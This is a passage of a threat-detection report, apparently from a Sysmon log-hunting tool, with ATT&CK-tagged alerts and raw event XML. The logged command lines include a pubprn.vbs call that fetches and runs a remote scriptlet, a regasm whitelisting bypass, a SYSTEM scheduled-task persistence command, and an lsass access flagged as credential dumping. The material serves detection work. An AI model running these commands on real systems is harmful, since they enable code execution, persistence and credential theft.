<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:39.312305Z"">
</TimeCreated>
<EventRecordID>4925</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:39.152</Data>
<Data Name=""ProcessGuid"">747F3D96-6633-5D3F-0000-001051608900</Data>
<Data Name=""ProcessId"">4092</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436085.311645,2019-07-30T01:34:45.311645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:45.242404Z"">
</TimeCreated>
<EventRecordID>5004</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:45.198</Data>
<Data Name=""ProcessGuid"">747F3D96-6675-5D3F-0000-0010AA498F00</Data>
<Data Name=""ProcessId"">4184</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1564436081.793311,2019-07-30T01:34:41.793311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( schtasks /create /tn &quot;mysc&quot; /tr C:\windows\system32\calc.exe /sc ONLOGON /ru &quot;System&quot; /f ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:40.889027Z"">
</TimeCreated>
<EventRecordID>5002</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Persistence - Scheduled Task Management</Data>
<Data Name=""UtcTime"">2019-07-29 21:34:40.755</Data>
<Data Name=""ProcessGuid"">747F3D96-6670-5D3F-0000-0010F9148F00</Data>
<Data Name=""ProcessId"">7076</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Task Scheduler Configuration Tool</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">schtasks /create /tn &quot;mysc&quot; /tr C:\windows\system32\calc.exe /sc ONLOGON /ru &quot;System&quot; /f</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6670-5D3F-0000-001099048F00</Data>
<Data Name=""ParentProcessId"">2916</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c schtasks /create /tn &quot;mysc&quot; /tr C:\windows\system32\calc.exe /sc ONLOGON /ru &quot;System&quot; /f</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553028158.70443,2019-03-20T00:42:38.704430+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /c msg * &quot;hello from run key&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:42:38.654358Z"">
</TimeCreated>
<EventRecordID>1966330</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:42:38.043</Data>
<Data Name=""ProcessGuid"">365ABB72-543E-5C91-0000-001009C90300</Data>
<Data Name=""ProcessId"">3068</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /c msg * &quot;hello from run key&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-543D-5C91-0000-001099A60300</Data>
<Data Name=""ParentProcessId"">2984</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1003] Credential Dumping - Process Access,1556608980.899263,2019-04-30T11:23:00.899263+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>10</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>10</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T07:23:00.899263Z"">
</TimeCreated>
<EventRecordID>8341</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1876"" ThreadID=""1444"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 07:23:00.883</Data>
<Data Name=""SourceProcessGUID"">365ABB72-F7C9-5CC7-0000-0010BF010E00</Data>
<Data Name=""SourceProcessId"">3772</Data>
<Data Name=""SourceThreadId"">1088</Data>
<Data Name=""SourceImage"">D:\m.exe</Data>
<Data Name=""TargetProcessGUID"">365ABB72-F6A1-5CC7-0000-001072590000</Data>
<Data Name=""TargetProcessId"">492</Data>
<Data Name=""TargetImage"">C:\Windows\system32\lsass.exe</Data>
<Data Name=""GrantedAccess"">0x1410</Data>
<Data Name=""CallTrace"">C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\system32\KERNELBASE.dll+8185|UNKNOWN(01770343)|UNKNOWN(0176FF9D)|UNKNOWN(0176F8EC)|UNKNOWN(00397486)|UNKNOWN(003973A0)|UNKNOWN(003978A3)|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436080.38552,2019-07-30T01:34:40.385520+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c schtasks /create /tn &quot;mysc&quot; /tr C:\windows\system32\calc.exe /sc ONLOGON /ru &quot;System&quot; /f ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:40.261289Z"">
</TimeCreated>
<EventRecordID>5000</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:40.243</Data>
<Data Name=""ProcessGuid"">747F3D96-6670-5D3F-0000-001099048F00</Data>
<Data Name=""ProcessId"">2916</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c schtasks /create /tn &quot;mysc&quot; /tr C:\windows\system32\calc.exe /sc ONLOGON /ru &quot;System&quot; /f</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:36.534474Z"">
</TimeCreated>
<EventRecordID>4998</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:36.528</Data>
<Data Name=""ProcessGuid"">747F3D96-666C-5D3F-0000-00104BB78E00</Data>
<Data Name=""ProcessId"">3872</Data>
<Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Calculator</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">calc</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6642-5D3F-0000-001044A68A00</Data>
<Data Name=""ParentProcessId"">2996</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-04-25T22:19:37.209189Z"">
</TimeCreated>
<EventRecordID>27803</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3572"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-04-25 22:19:27.149</Data>
<Data Name=""ProcessGuid"">747F3D96-B76F-5EA4-0000-0010624D0600</Data>
<Data Name=""ProcessId"">5840</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-B767-5EA4-0000-00209BD30100</Data>
<Data Name=""LogonId"">0x1d39b</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B769-5EA4-0000-001000800300</Data>
<Data Name=""ParentProcessId"">4472</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:36.534474Z"">
</TimeCreated>
<EventRecordID>4998</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:36.528</Data>
<Data Name=""ProcessGuid"">747F3D96-666C-5D3F-0000-00104BB78E00</Data>
<Data Name=""ProcessId"">3872</Data>
<Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Calculator</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">calc</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6642-5D3F-0000-001044A68A00</Data>
<Data Name=""ParentProcessId"">2996</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-04-25T22:19:37.209189Z"">
</TimeCreated>
<EventRecordID>27803</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3572"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-04-25 22:19:27.149</Data>
<Data Name=""ProcessGuid"">747F3D96-B76F-5EA4-0000-0010624D0600</Data>
<Data Name=""ProcessId"">5840</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-B767-5EA4-0000-00209BD30100</Data>
<Data Name=""LogonId"">0x1d39b</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B769-5EA4-0000-001000800300</Data>
<Data Name=""ParentProcessId"">4472</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-04-25T22:19:37.209189Z"">
</TimeCreated>
<EventRecordID>27803</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3572"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-04-25 22:19:27.149</Data>
<Data Name=""ProcessGuid"">747F3D96-B76F-5EA4-0000-0010624D0600</Data>
<Data Name=""ProcessId"">5840</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-B767-5EA4-0000-00209BD30100</Data>
<Data Name=""LogonId"">0x1d39b</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B769-5EA4-0000-001000800300</Data>
<Data Name=""ParentProcessId"">4472</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc</Data>
</EventData>
